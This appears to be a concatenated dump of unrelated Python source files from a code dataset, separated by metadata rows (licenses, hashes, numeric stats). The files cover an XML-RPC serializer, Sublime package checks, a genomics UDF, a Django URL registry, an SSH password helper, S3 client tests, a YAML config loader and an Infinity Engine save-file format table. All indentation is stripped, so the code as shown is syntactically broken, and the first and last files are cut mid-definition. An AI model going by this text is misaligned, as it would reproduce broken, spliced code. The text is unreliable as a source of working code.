return '<dateTime.iso8601>%s</dateTime.iso8601>' % obj.strftime('%Y%m%dT%H:%M:%S')
@serializer(date)
def serialize_date(obj: date) -> str:
return '<dateTime.iso8601>%s</dateTime.iso8601>' % obj.strftime('%Y%m%dT00:00:00')
@serializer(Sequence)
def serialize_sequence(obj: Sequence) -> str:
payload = [serialize(value) for value in obj]
return '<array><data>%s</data></array>' % ''.join(payload)
@serializer(Mapping)
def serialize_mapping(obj: Mapping) -> str:
payload = '<struct>'
for key, value in obj.items():
serialized_value = serialize(value)
payload += '<member><name>%s</name>%s</member>' % (escape(key), serialized_value)
return payload + '</struct>'
def deserialize(value: Element):
"""
Deserialize an XML-RPC <value> element.
:param value: an XML element with the tag <value>
:return: the deserialized value
"""
child = value[0]
try:
func = _deserializers[child.tag]
except KeyError:
raise LookupError('unknown XML-RPC type: %s' % child.tag) from None
return func(child)
def deserializer(*names: str):
def wrapper(func):
_deserializers.update({key: func for key in names})
return func
return wrapper
@deserializer('string')
def deserialize_str(element: Element) -> str:
return element.text
@deserializer('boolean')
def deserialize_bool(element: Element) -> bool:
if element.text == '1':
return True
elif element.text == '0':
return False
else:
raise ValueError('invalid value for boolean: %s' % element.text)
@deserializer('int', 'i4')
def deserialize_int(element: Element) -> int:
return int(element.text)
@deserializer('double', 'float')
def deserialize_float(element: Element) -> float:
return float(element.text)
@deserializer('base64')
def deserialize_base64(element: Element) -> bytes:
return b64decode(element.text)
@deserializer('dateTime.iso8601')
def deserialize_datetime(element: Element) -> datetime:
return datetime.strptime(element.text, '%Y%m%dT%H:%M:%S')
@deserializer('array')
def deserialize_array(element: Element) -> List:
return [deserialize(value) for value in element.findall('data/value')]
@deserializer('struct')
def deserialize_struct(element: Element) -> Dict[str, Any]:
members = element.findall('member')
return {member.find('name').text: deserialize(member.find('value')) for member in members}
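# Hedged round-trip sketch:
#
# from lxml.etree import fromstring
# xml = serialize({'answer': 42, 'tags': ['a', 'b']})
# value = deserialize(fromstring(xml))
# assert value == {'answer': 42, 'tags': ['a', 'b']}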
|
apache-2.0
| 5,541,318,617,819,902,000
| 25.166667
| 94
| 0.671621
| false
| 3.635506
| false
| false
| false
|
packagecontrol/st_package_reviewer
|
st_package_reviewer/check/file/check_redundant_files.py
|
2
|
1795
|
import logging
from . import FileChecker
l = logging.getLogger(__name__)
class CheckPackageMetadata(FileChecker):
def check(self):
if self.sub_path("package-metadata.json").is_file():
self.fail("'package-metadata.json' is supposed to be automatically generated "
"by Package Control during installation")
class CheckPycFiles(FileChecker):
def check(self):
pyc_files = self.glob("**/*.pyc")
if not pyc_files:
return
for path in pyc_files:
if path.with_suffix(".py").is_file():
with self.file_context(path):
self.fail("'.pyc' file is redundant because its corresponding .py file exists")
class CheckCacheFiles(FileChecker):
def check(self):
cache_files = self.glob("**/*.cache")
if not cache_files:
return
for path in cache_files:
with self.file_context(path):
self.fail("'.cache' file is redundant and created by ST automatically")
class CheckSublimePackageFiles(FileChecker):
def check(self):
cache_files = self.glob("**/*.sublime-package")
if not cache_files:
return
for path in cache_files:
with self.file_context(path):
self.fail("'.sublime-package' files have no business being inside a package")
class CheckSublimeWorkspaceFiles(FileChecker):
def check(self):
cache_files = self.glob("**/*.sublime-workspace")
if not cache_files:
return
for path in cache_files:
with self.file_context(path):
self.fail("'.sublime-workspace' files contain session data and should never be "
"submitted to version control")
|
mit
| 7,026,769,167,104,673,000
| 27.492063
| 99
| 0.597214
| false
| 4.356796
| false
| false
| false
|
HazyResearch/dd-genomics
|
archived/v1/code/gene_pheno_pairs.py
|
1
|
2378
|
import ddext
from ddext import SD
def init():
ddext.input('doc_id', 'text')
ddext.input('sent_id_1', 'int')
ddext.input('mention_id_1', 'text')
ddext.input('wordidxs_1', 'int[]')
ddext.input('words_1', 'text[]')
ddext.input('entity_1', 'text')
ddext.input('type_1', 'text')
ddext.input('correct_1', 'boolean')
ddext.input('sent_id_2', 'int')
ddext.input('mention_id_2', 'text')
ddext.input('wordidxs_2', 'int[]')
ddext.input('words_2', 'text[]')
ddext.input('entity_2', 'text')
ddext.input('type_2', 'text')
ddext.input('correct_2', 'boolean')
ddext.returns('doc_id', 'text')
ddext.returns('sent_id_1', 'int')
ddext.returns('sent_id_2', 'int')
ddext.returns('relation_id', 'text')
ddext.returns('type', 'text')
ddext.returns('mention_id_1', 'text')
ddext.returns('mention_id_2', 'text')
ddext.returns('wordidxs_1', 'int[]')
ddext.returns('wordidxs_2', 'int[]')
ddext.returns('words_1', 'text[]')
ddext.returns('words_2', 'text[]')
ddext.returns('entity_1', 'text')
ddext.returns('entity_2', 'text')
ddext.returns('is_correct', 'boolean')
def run(doc_id, sent_id_1, mention_id_1, wordidxs_1, words_1, entity_1, mtype_1, correct_1, sent_id_2, mention_id_2, wordidxs_2, words_2, entity_2, mtype_2, correct_2):
if 'pos_pairs' in SD:
pos_pairs = SD['pos_pairs']
else:
import os
APP_HOME = os.environ['DD_GENOMICS_HOME']
pos_pairs = set()
gpheno = [x.strip().split('\t') for x in open('%s/onto/data/hpo_phenotype_genes.tsv' % APP_HOME)]
gdisease = [x.strip().split('\t') for x in open('%s/onto/data/hpo_disease_genes.tsv' % APP_HOME)]
for pheno, gene in gpheno + gdisease:
pos_pairs.add((gene, pheno))
SD['pos_pairs'] = pos_pairs
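  # SD is DeepDive's shared dictionary: it persists across run() calls within
  # a UDF worker process, so the positive-pair lookup above is built only once.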
rid = '%s_%s_g%s_p%s' % (doc_id, sent_id_1,
'%d:%d' % (wordidxs_1[0], wordidxs_1[-1]),
'%d:%d' % (wordidxs_2[0], wordidxs_2[-1]),
)
truth = None
if correct_1 and correct_2:
gene = entity_1
for pheno in entity_2.split()[0].split('|'):
if (gene, pheno) in pos_pairs:
truth = True
elif correct_1 is False or correct_2 is False:
truth = False
yield (doc_id,
sent_id_1,
sent_id_2,
rid,
None,
mention_id_1,
mention_id_2,
wordidxs_1,
wordidxs_2,
words_1,
words_2,
entity_1,
entity_2,
truth
)
|
apache-2.0
| -2,130,952,374,785,913,000
| 29.101266
| 168
| 0.584945
| false
| 2.535181
| false
| false
| false
|
dgouldin/djangocon-eu-2015
|
djapi/api/url_registry.py
|
2
|
2925
|
import types
from collections import defaultdict
from functools import wraps
from urlparse import urljoin
from django.contrib.contenttypes.models import ContentType
from django.core.urlresolvers import reverse, NoReverseMatch
LIST_METHODS = ('POST',)
DETAIL_METHODS = ('PUT', 'PATCH', 'DELETE',)
ALL_METHODS = LIST_METHODS + DETAIL_METHODS
model_registry = defaultdict(list)
def register(methods, model):
"""
Decorator for registering lookup functions. Modeled after django.dispatch.receiver.
A lookup_func should return a fully qualified path.
"""
def _decorator(lookup_func):
model_registry[model].append((methods, lookup_func))
return lookup_func
return _decorator
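# Hedged usage sketch (model and view names are illustrative):
#
# @register(DETAIL_METHODS, Widget)
# def widget_detail_url(obj):
#     return reverse('widget-detail', kwargs={'pk': obj.pk})
#
# or, with the helpers below:
# register(DETAIL_METHODS, Widget)(primary_key('widget-detail'))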
def normalize_channel(path):
"Strip off querystring and trailing slashes"
return path.split('?', 1)[0].rstrip('/')
def find_urls(obj, method):
"Utility to locate URLs that might include details of a given object"
for methods, lookup_func in model_registry[type(obj)]:
if method in methods:
yield lookup_func(obj)
# helpers for generating common URLs
def empty(viewname):
"For URLs that don't require any arguments at all"
url = reverse(viewname)
def _empty(obj):
return url
return _empty
def primary_key(viewname):
"For URLs that accept a primary key as 'pk'"
def _primary_key(obj):
return reverse(viewname, kwargs={'pk': obj.pk})
return _primary_key
def primary_key_filter(viewname):
"For URLs that filter on the primary key field via a query param"
def _primary_key_filter(obj):
pk_field = obj.__class__._meta.pk.name
return "{}?{}={}".format(reverse(viewname), pk_field, obj.pk)
return _primary_key_filter
def foreign_key(viewname, fk_field_name):
"""
For URLs that refer to an instance via a foreign key
Accepts the name of the foreign key
"""
def _foreign_key(obj):
fk_field = obj.__class__._meta.get_field(fk_field_name)
return reverse(viewname, kwargs={'pk': getattr(obj, fk_field.attname)})
return _foreign_key
def generic_foreign_key(viewname, gfk_field_name, model):
"""
For URLs that refer to an instance via a generic foreign key
Accepts the name of the foreign key, and also the model this particular URL
is associated with, since the foreign key can refer to multiple model types
"""
def _generic_foreign_key(obj):
content_type_id = ContentType.objects.get_for_model(model).id
gfk_field = getattr(obj.__class__, gfk_field_name)
ct_field = obj._meta.get_field(gfk_field.ct_field)
if getattr(obj, ct_field.attname) == content_type_id:
return reverse(viewname, kwargs={'pk': getattr(obj, gfk_field.fk_field)})
# this should never happen
raise NoReverseMatch('Unable to resolve generic foreign key for {}'.format(obj))
return _generic_foreign_key
|
mit
| -4,767,235,335,549,177,000
| 30.451613
| 88
| 0.681709
| false
| 3.889628
| false
| false
| false
|
jarod-w/ocsetup
|
ocsetup/sshcmd.py
|
1
|
1977
|
#!/usr/bin/env python
import pexpect
import sys
import gtk
from ovirtnode.ovirtfunctions import log
class PopupEntry(gtk.Dialog):
def __init__(self, label="", title="", parent=None, flags=0, buttons=None):
super(PopupEntry, self).__init__(title, parent, flags, buttons)
self.hbox = gtk.HBox()
self.label = gtk.Label(label)
self.add_button("OK", gtk.RESPONSE_OK)
self.entry = gtk.Entry()
self.entry.set_visibility(False)
self.hbox.pack_start(self.label)
self.hbox.pack_start(self.entry)
self.vbox.pack_start(self.hbox)
self.set_position(gtk.WIN_POS_CENTER_ALWAYS)
def run_and_close(self):
self.show_all()
resp_id = self.run()
text = self.entry.get_text()
self.destroy()
return text
def runcmd(cmd):
child = pexpect.spawn(cmd, logfile=sys.stdout)
while True:
i = child.expect([
pexpect.TIMEOUT,
'Are you sure you want to continue connecting',
'Enter passphrase for key',
'Permission denied, please try again.',
'password: ',
'Permission denied',
pexpect.EOF])
if i == 0:
# TIMEOUT.
return
elif i == 1:
child.sendline('yes')
elif i == 2:
child.send("\r")
        elif i == 3:
            # wrong password, but you can still try AGAIN
            password = PopupEntry(
                label='Password:',
                title="Wrong Password?").run_and_close()
            # wait for the re-issued 'password: ' prompt and answer it
            # (previously the new password was collected but never sent)
            if child.expect([pexpect.TIMEOUT, 'password: ']) == 1:
                child.sendline(password)
elif i == 4:
password = PopupEntry(label='Password:').run_and_close()
child.sendline(password)
elif i == 5:
# LOGIN FAILED
return
elif i == 6:
# LOGIN SUCCEED.
return child
else:
log(
"run cmd error i = %d\n before:%s\nafter:%s" %
(i, child.before, child.after))
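# Hedged usage sketch: runcmd("ssh root@192.0.2.1 true") pops up password
# prompts as needed and returns the pexpect child on success (EOF), or None
# on timeout / final permission denial.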
|
gpl-2.0
| -8,240,140,385,106,602,000
| 28.954545
| 79
| 0.528073
| false
| 3.96988
| false
| false
| false
|
PyBossa/pybossa
|
test/test_s3_client.py
|
1
|
5554
|
# -*- coding: utf8 -*-
# This file is part of PYBOSSA.
#
# Copyright (C) 2015 Scifabric LTD.
#
# PYBOSSA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PYBOSSA is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with PYBOSSA. If not, see <http://www.gnu.org/licenses/>.
from mock import patch, MagicMock
from nose.tools import assert_raises
import json
from pybossa.s3_client import S3Client, NoSuchBucket, PrivateBucket
class TestS3Client(object):
def make_response(self, text, status_code=200):
fake_response = MagicMock()
fake_response.text = text
fake_response.status_code = status_code
return fake_response
bucket_with_content = (
"""<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>test-pybossa</Name>
<Prefix></Prefix>
<Marker></Marker>
<MaxKeys>1000</MaxKeys>
<IsTruncated>false</IsTruncated>
<Contents>
<Key>16535035993_1080p.mp4</Key>
<LastModified>2016-01-29T08:55:41.000Z</LastModified>
<ETag>"10055dfebe62cf30e34d87fd27b28efc"</ETag>
<Size>11801468</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>BFI-demo.mp4</Key>
<LastModified>2016-01-29T08:55:38.000Z</LastModified>
<ETag>"b24442a1484b6b8f2b4e08c43e0abd3f"</ETag>
<Size>27063915</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
</ListBucketResult>
""")
empty_bucket = (
"""<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>test-pybossa</Name>
<Prefix></Prefix>
<Marker></Marker>
<MaxKeys>1000</MaxKeys>
<IsTruncated>false</IsTruncated>
</ListBucketResult>
""")
no_such_bucket = (
"""<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchBucket</Code>
<Message>The specified bucket does not exist</Message>
<BucketName>test-pybosa</BucketName>
<RequestId>5DB95818E2273F2A</RequestId>
<HostId>2xqg6pMK20zocCIN0DpqzDVEmbNkqKdTrp0BT/K2EUBbSIek5+7333DjDVuvpN0fFR/Pp/+IkM8=</HostId>
</Error>
""")
bucket_with_folder = (
"""<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>test-pybossa</Name>
<Prefix></Prefix>
<Marker></Marker>
<MaxKeys>1000</MaxKeys>
<IsTruncated>false</IsTruncated>
<Contents>
<Key>myfolder/</Key>
<LastModified>2016-01-29T08:56:15.000Z</LastModified>
<ETag>"d41d8cd98f00b204e9800998ecf8427e"</ETag>
<Size>0</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
</ListBucketResult>
""")
private_bucket = (
"""<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>AccessDenied</Code>
<Message>Access Denied</Message>
<RequestId>0C189C667703869B</RequestId>
<HostId>e6HNleTSx+vQHCXsjphJNLumbwd2YfYfZMrEBEkGOF/0jCMDZf6RIrgUAooa+HT86f0Azr27/h4=</HostId>
</Error>
""")
@patch('pybossa.s3_client.requests')
def test_objects_return_empty_list_for_an_empty_bucket(self, requests):
resp = self.make_response(self.empty_bucket, 200)
requests.get.return_value = resp
objects = S3Client().objects('test-pybossa')
assert objects == [], objects
@patch('pybossa.s3_client.requests')
def test_objects_return_list_of_object_names_in_a_bucket(self, requests):
resp = self.make_response(self.bucket_with_content, 200)
requests.get.return_value = resp
objects = S3Client().objects('test-pybossa')
assert objects == [u'16535035993_1080p.mp4', u'BFI-demo.mp4'], objects
@patch('pybossa.s3_client.requests')
def test_objects_not_returns_folders_inside_bucket(self, requests):
resp = self.make_response(self.bucket_with_folder, 200)
requests.get.return_value = resp
objects = S3Client().objects('test-pybossa')
assert objects == [], objects
@patch('pybossa.s3_client.requests')
def test_objects_raises_NoSuchBucket_if_bucket_does_not_exist(self, requests):
resp = self.make_response(self.no_such_bucket, 404)
requests.get.return_value = resp
assert_raises(NoSuchBucket, S3Client().objects, 'test-pybossa')
@patch('pybossa.s3_client.requests')
def test_objects_raises_PrivateBucket_if_bucket_is_private(self, requests):
        resp = self.make_response(self.private_bucket, 403)
requests.get.return_value = resp
assert_raises(PrivateBucket, S3Client().objects, 'test-pybossa')
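# A minimal usage sketch, not part of the test suite: it assumes network
# access to a real public bucket and exercises the same S3Client API that
# the tests above mock out.
if __name__ == '__main__':
    client = S3Client()
    try:
        print(client.objects('test-pybossa'))
    except NoSuchBucket:
        print('bucket does not exist')
    except PrivateBucket:
        print('bucket is private')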
|
agpl-3.0
| -8,953,775,506,088,436,000
| 37.041096
| 105
| 0.620274
| false
| 3.413645
| true
| false
| false
|
LastAvenger/labots
|
labots/config/config.py
|
1
|
3322
|
import logging
import yaml
from typing import Dict
from labots.config import checker
from labots.common import meta
# Initialize logging
logger = logging.getLogger(__name__)
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
class Config(AttrDict):
pass
def load_config(raw: str) -> Config:
""" Load config from a yaml format string. """
    d = yaml.safe_load(raw)  # safe_load: a config file should not construct arbitrary objects
try:
checker.check(d, [
checker.Item(key = ['log', 'level'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = 'info'),
checker.Item(key = ['log', 'output'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = 'stderr'),
checker.Item(key = ['log', 'color'],
checkers = [checker.is_bool],
default = True),
checker.Item(key = ['irc', 'host'],
checkers = [checker.is_str, checker.is_not_empty_str],
required = True),
checker.Item(key = ['irc', 'port'],
checkers = [checker.is_int, checker.is_port],
default = 6667,
required = True),
checker.Item(key = ['irc', 'tls'],
checkers = [checker.is_bool],
default = False),
checker.Item(key = ['irc', 'tls_verify'],
checkers = [checker.is_bool],
default = True),
checker.Item(key = ['irc', 'server_password'],
checkers = [checker.is_str],
default = None),
checker.Item(key = ['irc', 'nickname'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = meta.name),
checker.Item(key = ['irc', 'username'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = meta.name),
checker.Item(key = ['irc', 'realname'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = meta.url),
checker.Item(key = ['irc', 'user_password'],
checkers = [checker.is_str],
default = None),
checker.Item(key = ['manager', 'bots'],
checkers = [checker.is_str],
required = True),
checker.Item(key = ['manager', 'config'],
checkers = [checker.is_str]),
checker.Item(key = ['server', 'listen'],
checkers = [checker.is_str],
default = meta.default_listen),
checker.Item(key = ['storage', 'db'],
checkers = [checker.is_str],
default = './storage.db'),
checker.Item(key = ['cache', 'db'],
checkers = [checker.is_str],
default = './cache.db'),
])
    except (KeyError, ValueError):
        raise
return Config(_build_attr_dict(d))
def _build_attr_dict(d: Dict) -> AttrDict:
""" Recursively convert all dict to AttrDict. """
r = {}
for k, v in d.items():
if isinstance(v, dict):
r[k] = _build_attr_dict(v)
else:
r[k] = v
return AttrDict(r)
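# A minimal usage sketch (assumes a YAML document that satisfies the checker
# items above; 'irc.host' and 'manager.bots' are the fields without defaults):
if __name__ == '__main__':
    cfg = load_config('irc:\n  host: irc.example.org\nmanager:\n  bots: ./bots\n')
    # AttrDict makes nested keys available as attributes
    print(cfg.irc.host, cfg.irc.port, cfg.log.level)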
|
gpl-3.0
| 1,553,425,372,541,772,800
| 34.340426
| 70
| 0.491872
| false
| 3.968937
| true
| false
| false
|
gemrb/iesh
|
infinity/formats/gam_v22.py
|
1
|
31222
|
# -*-python-*-
# ie_shell.py - Simple shell for Infinity Engine-based game files
# Copyright (C) 2004-2009 by Jaroslav Benkovsky, <edheldil@users.sf.net>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# Conforms to IESDP 18.10.2019
from infinity.format import Format, register_format
class GAM_V22_Format (Format):
header_desc = (
{ 'key': 'signature',
'type': 'STR4',
'off': 0x0000,
'label': 'Signature',
'default': 'GAME' },
{ 'key': 'version',
'type': 'STR4',
'off': 0x0004,
'label': 'Version',
'default': 'V2.2'},
{ 'key': 'game_time',
'type': 'DWORD',
'off': 0x0008,
'label': 'Game time (300 units==1 hour)' },
{ 'key': 'formation',
'type': 'WORD',
'off': 0x000C,
'label': 'Selected formation'},
{ 'key': 'formation_button',
'type': 'WORD',
'off': 0x000E,
'count': 5,
'label': 'Formation button'},
{ 'key': 'gold',
'type': 'DWORD',
'off': 0x0018,
'label': 'Party gold'},
{ 'key': 'pc_cnt0',
'type': 'WORD',
'off': 0x001C,
'label': 'Unknown / PC count'},
{ 'key': 'weather',
'type': 'WORD',
'off': 0x001E,
'mask': { 0x01: 'rain', 0x02: 'snow' },
'label': 'Weather'},
{ 'key': 'pc_off',
'type': 'DWORD',
'off': 0x0020,
'label': 'PC offset'},
{ 'key': 'pc_cnt',
'type': 'DWORD',
'off': 0x0024,
'label': 'PC count (incl. protagonist)'},
{ 'key': 'unknown28',
'type': 'DWORD',
'off': 0x0028,
'label': '(offset to party inventory)'},
{ 'key': 'unknown2C',
'type': 'DWORD',
'off': 0x002C,
'label': '(count of party inventory)'},
{ 'key': 'npc_off',
'type': 'DWORD',
'off': 0x0030,
'label': 'NPC offset'},
{ 'key': 'npc_cnt',
'type': 'DWORD',
'off': 0x0034,
'label': 'NPC count'},
{ 'key': 'global_off',
'type': 'DWORD',
'off': 0x0038,
'label': 'GLOBAL variables offset'},
{ 'key': 'global_cnt',
'type': 'DWORD',
'off': 0x003C,
'label': 'GLOBAL variables count'},
{ 'key': 'main_area',
'type': 'RESREF',
'off': 0x0040,
'label': 'Main area'},
{ 'key': 'familiar_extra_off',
'type': 'DWORD',
'off': 0x0048,
'label': 'Unknown / Familiar extra offset'},
{ 'key': 'journal_entry_cnt',
'type': 'DWORD',
'off': 0x004C,
'label': 'Journal entries count'},
{ 'key': 'journal_entry_off',
'type': 'DWORD',
'off': 0x0050,
'label': 'Journal entries offset'},
{ 'key': 'reputation',
'type': 'DWORD',
'off': 0x0054,
'label': 'Party reputation (*10)'},
{ 'key': 'current_area',
'type': 'RESREF',
'off': 0x0058,
'label': 'Current area'},
{ 'key': 'gui_flags',
'type': 'DWORD',
'off': 0x0060,
'mask': {0x01: 'party_ai_enabled',
0x02: 'text_window_size1',
0x04: 'text_window_size2',
0x08: 'unknown bit3',
0x10: 'hide_gui',
0x20: 'hide_options',
0x40: 'hide_portraits',
0x80: 'hide_automap_notes' },
'label': 'GUI flags'},
{ 'key': 'loading_progress',
'type': 'DWORD',
'off': 0x0064,
'enum': {0: 'restrict_xp_to_bg1_limit',
1: 'restrict_xp_to_totsc_limit',
2: 'restrict_xp_to_soa_limit',
3: 'XNEWAREA.2DA processing to be done',
4: 'XNEWAREA.2DA processing complete',
5: 'TOB active'},
'label': 'Unknown / Loading progress'},
{ 'key': 'familiar_off',
'type': 'DWORD',
'off': 0x0068,
'label': 'Familiar info offset'},
{ 'key': 'stored_location_off',
'type': 'DWORD',
'off': 0x006C,
'label': 'Stored locations offset'},
{ 'key': 'stored_location_cnt',
'type': 'DWORD',
'off': 0x0070,
'label': 'Stored locations count'},
{ 'key': 'game_time',
'type': 'DWORD',
'off': 0x0074,
'label': 'Game time (real seconds)'},
{ 'key': 'pocket_plane_location_off',
'type': 'DWORD',
'off': 0x0078,
'label': 'Pocket plane locations offset'},
{ 'key': 'pocket_plane_location_cnt',
'type': 'DWORD',
'off': 0x007C,
'label': 'Pocket plane locations count'},
{ 'key': 'unknown80',
'type': 'BYTES',
'off': 0x0080,
'size': 52,
'label': 'Unknown 80'},
)
npc_desc = (
{ 'key': 'character_selection',
'type': 'WORD',
'off': 0x0000,
'enum': {0: 'not selected', 1: 'selected', 0x8000: 'dead'},
'label': 'Character selection'},
{ 'key': 'party_order',
'type': 'WORD',
'off': 0x0002,
'label': 'Party order'},
{ 'key': 'cre_off',
'type': 'DWORD',
'off': 0x0004,
'label': 'CRE offset'},
{ 'key': 'cre_size',
'type': 'DWORD',
'off': 0x0008,
'label': 'CRE size'},
{ 'key': 'character_name',
'type': 'STR8',
'off': 0x000C,
'size': 8,
'label': 'Character name'},
{ 'key': 'orientation',
'type': 'DWORD',
'off': 0x0014,
'label': 'Orientation'},
{ 'key': 'current_area',
'type': 'RESREF',
'off': 0x0018,
'label': 'Current area'},
{ 'key': 'x',
'type': 'WORD',
'off': 0x0020,
'label': 'X coordinate'},
{ 'key': 'y',
'type': 'WORD',
'off': 0x0022,
'label': 'Y coordinate'},
{ 'key': 'view_x',
'type': 'WORD',
'off': 0x0024,
          'label': 'Viewing rectangle X coordinate'},
{ 'key': 'view_y',
'type': 'WORD',
'off': 0x0026,
'label': 'Viewing rectangle Y coordinate'},
{ 'key': 'modal_action',
'type': 'WORD',
'off': 0x0028,
'label': 'Modal action'},
{ 'key': 'happiness',
'type': 'WORD',
'off': 0x002A,
'label': 'Happiness'},
{ 'key': 'num_times_interacted_npc_count',
'type': 'DWORD',
'off': 0x002C,
'count': 24,
'label': 'Num times interacted NPC count (unused)' },
{ 'key': 'quick_weapon_slot_index',
'type': 'WORD',
'off': 0x008C,
'count': 8,
'label': 'Index into slots.ids for main Quick Weapon or offhand, interchanging (FFFF=none)' },
{ 'key': 'quick_slot_usable',
'type': 'WORD',
'off': 0x009C,
'count': 8,
'label': 'Is the quick weapon slot usable?' },
{ 'key': 'quick_spell_resource',
'type': 'RESREF',
'off': 0x00AC,
'count': 9,
'label': 'Quick spell resource' },
{ 'key': 'quick_spell_class',
'type': 'BYTE',
'off': 0x00F4,
'count': 9,
'label': 'Quick spell class' },
{ 'key': 'quick_spell_unknown',
'type': 'BYTE',
'off': 0x00FD,
'count': 1,
'label': '(Quick spell) unknown' },
{ 'key': 'quick_item_slot_index',
'type': 'WORD',
'off': 0x00FE,
'count': 3,
'label': 'Index into slots.ids for Quick Item (FFFF=none)' },
{ 'key': 'quick_item_slot_ability',
'type': 'WORD',
'off': 0x0104,
'count': 3,
'label': 'Quick Item slot usable' },
{ 'key': 'quick_innate',
'type': 'RESREF',
'off': 0x010A,
'count': 9,
'label': 'Quick innate' },
{ 'key': 'quick_song',
'type': 'RESREF',
'off': 0x0152,
'count': 9,
'label': 'Quick song' },
{ 'key': 'quick_slot',
'type': 'RESREF',
'off': 0x019A,
'count': 9,
'label': 'Quick slot' },
{ 'key': 'name',
'type': 'STR32',
'off': 0x01BE,
'label': 'Name' },
{ 'key': 'talkcount',
'type': 'DWORD',
'off': 0x01C2,
'label': 'Talkcount' },
{ 'key': 'stats',
'type': 'BYTES',
'off': 0x01C6,
'size': 116,
'label': 'Stats' },
{ 'key': 'soundset',
'type': 'RESREF',
'off': 0x023A,
'label': 'Sound set' },
{ 'key': 'voiceset',
'type': 'STR32',
'off': 0x0242,
'label': 'Voice set' },
{ 'key': 'unknown_1',
'type': 'DWORD',
'off': 0x0262,
'label': 'Unknown 1' },
{ 'key': 'unknown_2',
'type': 'DWORD',
'off': 0x0266,
'label': 'Unknown 2' },
{ 'key': 'unknown_3',
'type': 'DWORD',
'off': 0x026A,
'label': 'Unknown 3' },
{ 'key': 'expertise',
'type': 'DWORD',
'off': 0x026E,
'label': 'Expertise' },
{ 'key': 'power_attack',
'type': 'DWORD',
'off': 0x0272,
'label': 'Power attack' },
{ 'key': 'arterial_strike',
'type': 'DWORD',
'off': 0x0276,
'label': 'Arterial Strike' },
{ 'key': 'hamstring',
'type': 'DWORD',
'off': 0x027A,
'label': 'Hamstring' },
{ 'key': 'rapid_shot',
'type': 'DWORD',
'off': 0x027E,
'label': 'Rapid Shot' },
{ 'key': 'unknown_4',
'type': 'DWORD',
'off': 0x0282,
'label': 'Unknown 4' },
{ 'key': 'unknown_5',
'type': 'BYTES',
'size': 3,
'off': 0x0286,
'label': 'Unknown 5' },
{ 'key': 'selected_w_slot',
'type': 'WORD',
'off': 0x0289,
'label': 'Selected weapon slot' },
{ 'key': 'unknown_6',
'type': 'BYTES',
'size': 153,
'off': 0x028B,
'label': 'Unknown 6' },
)
pc_desc = npc_desc
global_desc = (
{ 'key': 'name',
'type': 'STR32',
'off': 0x0000,
'label': 'Variable name' },
{ 'key': 'type',
'type': 'WORD',
'off': 0x0020,
# TODO: add mask: (bit 0: int, bit 1: float, bit 2: script name, bit 3: resref, bit 4: strref, bit 5: dword)
'label': 'Type' },
{ 'key': 'refval',
'type': 'WORD',
'off': 0x0022,
'label': 'Ref value' },
{ 'key': 'dwval',
'type': 'DWORD',
'off': 0x0024,
'label': 'DWORD value' },
{ 'key': 'intval',
'type': 'DWORD',
'off': 0x0028,
'label': 'INT value' },
{ 'key': 'dblval',
'type': 'BYTES',
'off': 0x002c,
'size': 8,
'label': 'DOUBLE value' },
{ 'key': 'scrnameval',
'type': 'BYTES',
'off': 0x0033,
'size': 32,
'label': 'Script name value' },
)
journal_entry_desc = (
{ 'key': 'text',
'type': 'STRREF',
'off': 0x0000,
'label': 'Journal text' },
{ 'key': 'time',
'type': 'DWORD',
'off': 0x0004,
'label': 'Time (secs)' },
{ 'key': 'current_chapter',
'type': 'BYTE',
'off': 0x0008,
'label': 'Current chapter number' },
{ 'key': 'unknown09',
'type': 'BYTE',
'off': 0x0009,
'label': 'Unknown 09' },
{ 'key': 'section',
'type': 'BYTE',
'off': 0x000A,
'mask': { 0x01: 'quests', 0x02: 'Completed quests', 0x04: 'Journal info' },
'label': 'Journal section' },
{ 'key': 'location_flag',
'type': 'BYTE',
'off': 0x000B,
'enum': { 0x1F: 'external TOT/TOH', 0xFF: 'internal TLK' },
'label': 'Location flag' },
)
familiar_info_desc = (
{ 'key': 'lg_familiar',
'type': 'RESREF',
'off': 0x0000,
          'label': 'Lawful good familiar' },
{ 'key': 'ln_familiar',
'type': 'RESREF',
'off': 0x0008,
'label': 'Lawful neutral familiar' },
{ 'key': 'le_familiar',
'type': 'RESREF',
'off': 0x0010,
'label': 'Lawful evil familiar' },
{ 'key': 'ng_familiar',
'type': 'RESREF',
'off': 0x0018,
'label': 'Neutral good familiar' },
{ 'key': 'nn_familiar',
'type': 'RESREF',
'off': 0x0020,
'label': 'True neutral familiar' },
{ 'key': 'ne_familiar',
'type': 'RESREF',
'off': 0x0028,
'label': 'Neutral evil familiar' },
{ 'key': 'cg_familiar',
'type': 'RESREF',
'off': 0x0030,
          'label': 'Chaotic good familiar' },
{ 'key': 'cn_familiar',
'type': 'RESREF',
'off': 0x0038,
